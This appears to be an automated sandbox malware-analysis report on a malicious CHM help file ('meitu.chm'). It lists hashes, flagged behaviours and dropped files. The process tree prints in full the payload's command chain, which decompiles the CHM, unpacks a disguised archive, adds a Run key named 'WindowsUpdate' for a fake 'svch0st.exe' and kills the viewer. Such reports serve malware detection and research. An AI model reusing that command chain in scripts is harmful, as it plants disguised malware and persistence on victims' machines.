Analysis
-
max time kernel
131s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
16-03-2023 03:22
Static task
static1
Behavioral task
behavioral1
Sample
virus/meitu.chm
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
virus/meitu.chm
Resource
win10v2004-20230220-en
Behavioral task
behavioral3
Sample
virus/白加黑衍生物/UpgradeShow.dll
Resource
win7-20230220-en
Behavioral task
behavioral4
Sample
virus/白加黑衍生物/UpgradeShow.dll
Resource
win10v2004-20230220-en
Behavioral task
behavioral5
Sample
virus/白加黑衍生物/svch0st.exe
Resource
win7-20230220-en
Behavioral task
behavioral6
Sample
virus/白加黑衍生物/svch0st.exe
Resource
win10v2004-20230220-en
General
-
Target
virus/meitu.chm
-
Size
1.2MB
-
MD5
3dbfbb912f430ae62df647a767a86884
-
SHA1
0604930ef6eef2e10ae38e9b89d819ecda25f847
-
SHA256
8ffcc91dcb5657a9e8012bdc8b3b73bf541161f7c619e824fd5c5ae4b9b129f1
-
SHA512
984f57541f443b36b991df5a2bbb4f55760a9a08f0b49d3fb9908c6bcc0a7fa6eb16cb3c2fbb659e700836af35eef942c007ab60c4bb09972d6a34968dc1e38d
-
SSDEEP
24576:i7cuHGvz89BSOMfdLDCb1IlosIfHvzceiw3L3DYxROi2nmbvkIOMaNC:i7cuG89BSOALDs7sIPvzceiwb3DYv5bl
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 2 IoCs
Processes:
system_wiNuirements.mhtsvch0st.exepid process 732 system_wiNuirements.mht 4312 svch0st.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate = "\"C:\\ProgramData\\echelp\\svch0st.exe\"" reg.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exeipconfig.exepid process 1668 ipconfig.exe 3864 ipconfig.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 3656 taskkill.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs ping.exe 1 TTPs 3 IoCs
Processes:
PING.EXEPING.EXEPING.EXEpid process 2556 PING.EXE 628 PING.EXE 4260 PING.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
taskkill.exedescription pid process Token: SeDebugPrivilege 3656 taskkill.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
hh.execonhost.exepid process 3568 hh.exe 3568 hh.exe 520 conhost.exe -
Suspicious use of WriteProcessMemory 27 IoCs
Processes:
hh.execonhost.execmd.execmd.execmd.exedescription pid process target process PID 3568 wrote to memory of 520 3568 hh.exe conhost.exe PID 3568 wrote to memory of 520 3568 hh.exe conhost.exe PID 520 wrote to memory of 448 520 conhost.exe cmd.exe PID 520 wrote to memory of 448 520 conhost.exe cmd.exe PID 448 wrote to memory of 2588 448 cmd.exe hh.exe PID 448 wrote to memory of 2588 448 cmd.exe hh.exe PID 448 wrote to memory of 628 448 cmd.exe PING.EXE PID 448 wrote to memory of 628 448 cmd.exe PING.EXE PID 448 wrote to memory of 864 448 cmd.exe cmd.exe PID 448 wrote to memory of 864 448 cmd.exe cmd.exe PID 864 wrote to memory of 732 864 cmd.exe system_wiNuirements.mht PID 864 wrote to memory of 732 864 cmd.exe system_wiNuirements.mht PID 864 wrote to memory of 732 864 cmd.exe system_wiNuirements.mht PID 448 wrote to memory of 4260 448 cmd.exe PING.EXE PID 448 wrote to memory of 4260 448 cmd.exe PING.EXE PID 448 wrote to memory of 1668 448 cmd.exe ipconfig.exe PID 448 wrote to memory of 1668 448 cmd.exe ipconfig.exe PID 448 wrote to memory of 1728 448 cmd.exe cmd.exe PID 448 wrote to memory of 1728 448 cmd.exe cmd.exe PID 1728 wrote to memory of 1632 1728 cmd.exe reg.exe PID 1728 wrote to memory of 1632 1728 cmd.exe reg.exe PID 448 wrote to memory of 2556 448 cmd.exe PING.EXE PID 448 wrote to memory of 2556 448 cmd.exe PING.EXE PID 448 wrote to memory of 3864 448 cmd.exe ipconfig.exe PID 448 wrote to memory of 3864 448 cmd.exe ipconfig.exe PID 448 wrote to memory of 3656 448 cmd.exe taskkill.exe PID 448 wrote to memory of 3656 448 cmd.exe taskkill.exe
Processes
-
C:\Windows\hh.exe"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\virus\meitu.chm1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3568 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" cmd /C hh -decompile C:\ProgramData\echelp ./meitu.chm&ping 127.0.0.1 -n 1 >nul&cmd /C C:\ProgramData\echelp\system_wiNuirements.mht x C:\ProgramData\echelp\introducziPn.mht -O- C:\ProgramData\echelp\&ping 127.0.0.1 -n 1 >nul&start C:\ProgramData\echelp\duankai.lnk&cmd /C reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d \"C:\ProgramData\echelp\svch0st.exe\" /f&ping 127.0.0.1 -n 1 >nul&start C:\ProgramData\echelp\svch0st.exe&start C:\ProgramData\echelp\ipconfig.lnk&taskkill /f /t /im hh.exe"2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:520 -
C:\Windows\System32\cmd.execmd /C hh -decompile C:\ProgramData\echelp ./meitu.chm&ping 127.0.0.1 -n 1 >nul&cmd /C C:\ProgramData\echelp\system_wiNuirements.mht x C:\ProgramData\echelp\introducziPn.mht -O- C:\ProgramData\echelp\&ping 127.0.0.1 -n 1 >nul&start C:\ProgramData\echelp\duankai.lnk&cmd /C reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d \"C:\ProgramData\echelp\svch0st.exe\" /f&ping 127.0.0.1 -n 1 >nul&start C:\ProgramData\echelp\svch0st.exe&start C:\ProgramData\echelp\ipconfig.lnk&taskkill /f /t /im hh.exe3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:448 -
C:\Windows\hh.exehh -decompile C:\ProgramData\echelp ./meitu.chm4⤵PID:2588
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 14⤵
- Runs ping.exe
PID:628 -
C:\Windows\system32\cmd.execmd /C C:\ProgramData\echelp\system_wiNuirements.mht x C:\ProgramData\echelp\introducziPn.mht -O- C:\ProgramData\echelp\4⤵
- Suspicious use of WriteProcessMemory
PID:864 -
C:\ProgramData\echelp\system_wiNuirements.mhtC:\ProgramData\echelp\system_wiNuirements.mht x C:\ProgramData\echelp\introducziPn.mht -O- C:\ProgramData\echelp\5⤵
- Executes dropped EXE
PID:732 -
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 14⤵
- Runs ping.exe
PID:4260 -
C:\Windows\System32\ipconfig.exe"C:\Windows\System32\ipconfig.exe" /release4⤵
- Gathers network information
PID:1668 -
C:\Windows\system32\cmd.execmd /C reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d \"C:\ProgramData\echelp\svch0st.exe\" /f4⤵
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\system32\reg.exereg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d \"C:\ProgramData\echelp\svch0st.exe\" /f5⤵
- Adds Run key to start application
- Modifies registry key
PID:1632 -
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 14⤵
- Runs ping.exe
PID:2556 -
C:\ProgramData\echelp\svch0st.exeC:\ProgramData\echelp\svch0st.exe4⤵
- Executes dropped EXE
PID:4312 -
C:\Windows\System32\ipconfig.exe"C:\Windows\System32\ipconfig.exe" /renew4⤵
- Gathers network information
PID:3864 -
C:\Windows\system32\taskkill.exetaskkill /f /t /im hh.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3656
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\echelp\duankai.lnkFilesize
1KB
MD5494737c8bba58f091393c67d1a03f6c5
SHA12dadf68af7cef6a71638abdcf9002244b8234b46
SHA256ce4d3b1be35448fedade51dfe257d5e416209dfa3602dbab194933c33a29459f
SHA51260e09087de9b04153e88e3ea9d08f9860189f6475fbf8a20f3bc153586f02d9a20da88327e53d10be3af86700abc63eca74f7b25e3282aefdf3e2bd72e1d17e4
-
C:\ProgramData\echelp\introducziPn.mhtFilesize
891KB
MD50bad47cb97f01d24fdbefe3905d92d14
SHA175304034da42d22101a9680dc210ad76477d48bb
SHA256621d858908e53288bac2581c51c6a401300d6e66365a21310d865ee392da0670
SHA51237c54f4466c386f379c0ab10f7ca918ef019be41d2c5b45c2c02eaf59f41692d14f3600b08a2b5f05ed5994c397787b441526f73eded9e0300a7165e3af1b256
-
C:\ProgramData\echelp\ipconfig.lnkFilesize
1KB
MD585816dff477434c9eee3dfb7f5adec3d
SHA1f74a01d32eab8b975fef93802fecfe764a60dbb6
SHA256960935b125cb86149b7c5399a050ecc6ce91164a156662cd181319c479c54212
SHA512059aa8fd552c86c7504a93fda065cef5d1fdb93514ae99d459b517a2c5554c33d9c32d5b3f91a4adaba54185171cd4238e5813dd4568bed143097f4523e8759f
-
C:\ProgramData\echelp\svch0st.exeFilesize
985KB
MD59606b727e58cb0157e1586adac252462
SHA19bbb77aea71b44f0f7737ed47bae3fa67df6c8d4
SHA2568fcbe954783759e96a9cc1cf6aa2cb16d6c95a8f0a0c661ee0c1e241079c6de2
SHA5121d07695b0d597703336d0d0a50353712c83ba5354de006a7a444dd270253ce5a4e362cb98e83acfedabe325f29e3da51946cc3625bb8f452cf212cdccc9eba1f
-
C:\ProgramData\echelp\system_wiNuirements.mhtFilesize
587KB
MD5b5f45160976bb7ebac87b62ea1e6abcd
SHA10d08f13587ba55ca7792bf45ef2cc3d9925e411f
SHA2562f32d221f332feb1530896849a5345b9dba7a64b6c432b99b2846bfaa316044c
SHA512a0afc0ef35980157623b6390304a8427f9932ca8492fdc251cbb2802fb70e82b74b8c774d4df2f9b9968e970181dc2e382979e11d8b90d632a83ba6cea5c411a
-
C:\ProgramData\echelp\system_wiNuirements.mhtFilesize
587KB
MD5b5f45160976bb7ebac87b62ea1e6abcd
SHA10d08f13587ba55ca7792bf45ef2cc3d9925e411f
SHA2562f32d221f332feb1530896849a5345b9dba7a64b6c432b99b2846bfaa316044c
SHA512a0afc0ef35980157623b6390304a8427f9932ca8492fdc251cbb2802fb70e82b74b8c774d4df2f9b9968e970181dc2e382979e11d8b90d632a83ba6cea5c411a
-
memory/732-168-0x0000000000400000-0x0000000000507000-memory.dmpFilesize
1.0MB